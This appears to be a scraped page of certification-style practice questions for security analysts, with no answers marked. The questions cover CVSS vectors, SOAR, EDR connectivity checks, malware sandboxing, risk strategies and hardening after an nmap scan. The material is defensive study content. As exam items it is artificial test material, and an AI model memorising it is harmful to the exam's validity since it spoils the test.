security analyst needs to identify a computer based on the following requirements to be mitigated: The attack method is network-based with low complexity. No privileges or user action is needed. The confidentiality and availability level is high, with a low integrity level. Given the following CVSS 3.1 output: Computer1: CVSS3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:H Computer2: CVSS3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H Computer3: CVSS3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:H Computer4: CVSS3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H Which of the following machines should the analyst mitigate?. Computer1. Computer2. Computer3. Computer4.

Which of the following are process improvements that can be realized by implementing a SOAR solution? (Select two). Minimize security attacks. Itemize tasks for approval. Reduce repetitive tasks. Minimize setup complexity. Define a security strategy. Generate reports and metrics.

After an upgrade to a new EDR, a security analyst received reports that several endpoints were not communicating with the SaaS provider to receive critical threat signatures. To comply with the incident response playbook, the security analyst was required to validate connectivity to ensure communications. The security analyst ran a command that provided the following output: ComputerName: comptia007 RemotePort: 443 InterfaceAlias: Ethernet 3 TcpTestSucceeded: False Which of the following did the analyst use to ensure connectivity?. nmap. tnc. ping. tracert.

An employee received a phishing email that contained malware targeting the company. Which of the following is the best way for a security analyst to get more details about the malware and avoid disclosing information?. Upload the malware to the VirusTotal website. Share the malware with the EDR provider. Hire an external consultant to perform the analysis. Use a local sandbox in a microsegmented environment.

security analyst needs to develop a solution to protect a high-value asset from an exploit like a recent zero-day attack. Which of the following best describes this risk management strategy?. Avoid. Transfer. Accept. Mitigate.

Which of the following documents sets requirements and metrics for a third-party response during an event?. BIA. DRP. SLA. MOU.

A security analyst runs the following command: # nmap -T4 -F 192.168.30.30 Starting nmap 7.6 Host is up (0.13s latency) PORT STATE SERVICE 23/tcp open telnet 443/tcp open https 636/tcp open ldaps Which of the following should the analyst recommend first to harden the system?. Disable all protocols that do not use encryption. Configure client certificates for domain services. Ensure that this system is behind a NGFW. Deploy a publicly trusted root CA for secure websites.

Denunciar Test